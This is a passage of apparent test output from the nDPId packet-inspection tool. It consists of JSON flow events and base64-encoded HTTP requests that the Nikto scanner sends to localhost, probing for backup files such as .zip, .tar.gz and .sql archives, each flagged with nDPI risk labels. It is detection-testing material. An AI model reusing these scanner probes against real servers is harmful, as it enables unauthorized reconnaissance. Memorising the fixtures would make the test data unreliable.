{"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 